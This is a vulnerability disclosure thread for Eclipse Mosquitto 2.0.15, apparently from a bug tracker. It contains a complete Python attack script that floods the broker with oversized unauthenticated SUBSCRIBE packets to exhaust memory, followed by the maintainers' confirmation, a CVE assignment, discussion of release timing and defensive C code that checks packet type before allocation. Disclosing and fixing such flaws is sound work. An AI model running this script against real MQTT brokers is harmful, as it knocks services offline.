Created attachment 288879
attack script

Hello,

I found unauthenticated clients still can cause excessive memory use despite the fix for CVE-2017-7651 in Eclipse Mosquitto 2.0.15.

To fix CVE-2017-7651, a limitation on the remaining length of the CONNECT command has been applied to avoid unauthenticated clients causing excessive memory use.
(https://github.com/eclipse/mosquitto/blob/a8448a9c7b14bdaee6ec80419d43fd6544e789b6/lib/packet_mosq.c#L456)
=============================
case CMD_CONNECT:
    if(mosq->in_packet.remaining_length > 100000){
        /* Arbitrary limit, make configurable */
        return MOSQ_ERR_MALFORMED_PACKET;
    }
    break;
=============================
However, I found other commands (like SUBSCRIBE) may also cause the same situation (unauthenticated clients can cause excessive memory), which means other commands may also need limitation.

Environment:
docker Ubuntu 20.04.3 LTS with 4GB RAM
mosquitto version 2.0.15 (github commit a8448a9c7b14bdaee6ec80419d43fd6544e789b6 on Aug 16)

Attack simulation:
run server:
==============================
./src/mosquitto -c mosquitto.conf
==============================
In mosquitto.conf, disable anonymous
==============================
allow_anonymous false
==============================
run attack script:
==============================
python mosquitto_atk.py
==============================
the attack script (in python) may seem like
==============================
import socket
import threading
import time

ip_address = "0.0.0.0"
port = 1883
payload = b"\x80\x80\x80\x80t" + b"\01"*100000000 # mqtt SUBSCRIBE type message

def send_attack():
    soc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    soc.connect((ip_address,port))
    soc.sendall(payload)

while(True):
    for i in range(50):
        t = threading.Thread(target=send_attack)
        t.setDaemon(True)
        t.start()
    time.sleep(1)
==============================
Result: the server's RAM memory ends and the O.S. kills the process for Out of Memory (OOM)
Thank you for your report. I'm cc'ing the Mosquitto project lead (Roger) who can have a look at it.
Thank you for the report and the script. I confirm that this is a regression. Mikaël, could you please assign a CVE for this issue? Description: If a malicious client sends as its first command a valid MQTT packet that is not a CONNECT command, Mosquitto will attempt to allocate memory for the entire packet before rejecting it. This means it is possible for a malicious client to cause significant memory use and a denial of service. Affected versions: 1.6.7 to 2.0.15 inclusive. Fixed in 1.6.14 and 2.0.16. CVSS: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O
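The description above pins the defect to ordering: the broker decoded the declared packet length and allocated a buffer for it before asking whether a not-yet-connected client was allowed to send that packet type at all. The following is an added illustration of the defensive ordering, written for this page and not taken from Mosquitto's source: it parses the MQTT fixed header (control byte plus the 1..4-byte variable-length "remaining length"), then applies a state check before any allocation happens, so that a first packet which is not CONNECT is refused with no memory cost, and a CONNECT is capped at the 100000-byte limit quoted in the report. The RC_* codes, the STATE_* names, the function names and the simulated receive path are hypothetical; the CMD_CONNECT and CMD_SUBSCRIBE values follow the MQTT control-packet type encoding. The sample header bytes are constructed: the first is the 5-byte fixed header of the reporter's SUBSCRIBE payload (0x80 followed by a 4-byte length that decodes to 243269632), the second is a small CONNECT header.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Constants for this example. The CMD_* values follow the MQTT control packet
   type encoding (type in the high nibble); the 100000 limit is the one quoted
   in the report. The RC_* codes and the state names are hypothetical. */
#define CMD_CONNECT   0x10
#define CMD_SUBSCRIBE 0x80
#define CONNECT_MAX_REMAINING_LENGTH 100000

enum { RC_OK = 0, RC_MALFORMED = -1, RC_PROTOCOL = -2, RC_INCOMPLETE = -3 };
enum conn_state { STATE_NEW = 0, STATE_CONNECTED = 1 };

/* Parse the MQTT fixed header: one control byte followed by a 1..4 byte
   variable-length "remaining length" (7 data bits per byte, high bit is the
   continuation flag). Returns the header size in bytes or a negative RC_*
   value. Nothing is allocated here. */
int decode_fixed_header(const uint8_t *buf, size_t len,
                        uint8_t *cmd, uint32_t *remaining_length)
{
    uint32_t value = 0, multiplier = 1;
    size_t i = 1;

    if(len < 2) return RC_INCOMPLETE;
    for(;;){
        if(i > 4) return RC_MALFORMED;      /* at most 4 length bytes allowed */
        if(i >= len) return RC_INCOMPLETE;  /* need more bytes from the socket */
        uint8_t b = buf[i++];
        value += (uint32_t)(b & 0x7F) * multiplier;
        if((b & 0x80) == 0) break;          /* continuation bit clear: done */
        multiplier *= 128;
    }
    *cmd = buf[0] & 0xF0;
    *remaining_length = value;
    return (int)i;
}

/* The check the report asks for: run it after the fixed header is decoded and
   BEFORE a buffer of remaining_length bytes is allocated. A connection that has
   not yet sent CONNECT may only send CONNECT, and that CONNECT is length-capped. */
int check_before_alloc(enum conn_state state, uint8_t cmd, uint32_t remaining_length)
{
    if(state == STATE_NEW){
        if(cmd != CMD_CONNECT) return RC_PROTOCOL;
        if(remaining_length > CONNECT_MAX_REMAINING_LENGTH) return RC_MALFORMED;
    }
    return RC_OK;
}

/* Simulated receive path (hypothetical). Returns the RC_* verdict and writes
   the number of bytes that would have been allocated for the packet body,
   which is 0 whenever the packet is rejected. */
int simulate_receive(enum conn_state state, const uint8_t *buf, size_t len,
                     uint32_t *would_allocate)
{
    uint8_t cmd;
    uint32_t remaining_length;
    int rc;

    *would_allocate = 0;
    rc = decode_fixed_header(buf, len, &cmd, &remaining_length);
    if(rc < 0) return rc;
    rc = check_before_alloc(state, cmd, remaining_length);
    if(rc == RC_OK) *would_allocate = remaining_length;
    return rc;
}

/* Constructed samples: the first is the 5-byte fixed header of the report's
   payload (SUBSCRIBE with a 4-byte remaining length), the second is a small
   CONNECT header declaring a 12-byte body. */
static const uint8_t SAMPLE_SUBSCRIBE_HDR[5] = {0x80, 0x80, 0x80, 0x80, 0x74};
static const uint8_t SAMPLE_CONNECT_HDR[2]   = {0x10, 0x0C};

int main(void)
{
    uint32_t alloc;
    int rc;

    rc = simulate_receive(STATE_NEW, SAMPLE_SUBSCRIBE_HDR, sizeof SAMPLE_SUBSCRIBE_HDR, &alloc);
    printf("unauthenticated SUBSCRIBE: rc=%d would_allocate=%u\n", rc, (unsigned)alloc);

    rc = simulate_receive(STATE_CONNECTED, SAMPLE_SUBSCRIBE_HDR, sizeof SAMPLE_SUBSCRIBE_HDR, &alloc);
    printf("authenticated SUBSCRIBE:   rc=%d would_allocate=%u\n", rc, (unsigned)alloc);

    rc = simulate_receive(STATE_NEW, SAMPLE_CONNECT_HDR, sizeof SAMPLE_CONNECT_HDR, &alloc);
    printf("unauthenticated CONNECT:   rc=%d would_allocate=%u\n", rc, (unsigned)alloc);
    return 0;
}
```

The point of the split between decode_fixed_header and check_before_alloc is that the decoder only ever reads the few header bytes already in hand; the declared length is treated as untrusted input until the state check has approved it. Once a client has completed CONNECT the same SUBSCRIBE header is accepted, which is why the limit must be tied to connection state rather than applied blindly to every packet type.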
I do not think that there is sufficient time before the Christmas break to send out advance notice of the upcoming release, make the release, and still have confidence that updates will be made. I suggest it would therefore be best to wait until after the New Year to announce the new releases.
Roger, CVE-2023-0809 has been reserved. It does not contain any information about the affected project or the vulnerability. Let us know when you're ready for it to be published with the description. Thanks!
I'm aware we're coming up on a 90 day deadline since this report. In the interim we have found another security related bug that needs addressing, and a further bug has just been discovered as part of an external security audit. We would like to beg your patience until after the external security audit is complete, in a few weeks, so we can make a single release that addresses everything found.
Hello Roger, Do you have an ETA for the release to communicate to the reporter? Kind regards, Marta
The issue has been released. @Roger please take a look if we need any updates in the record.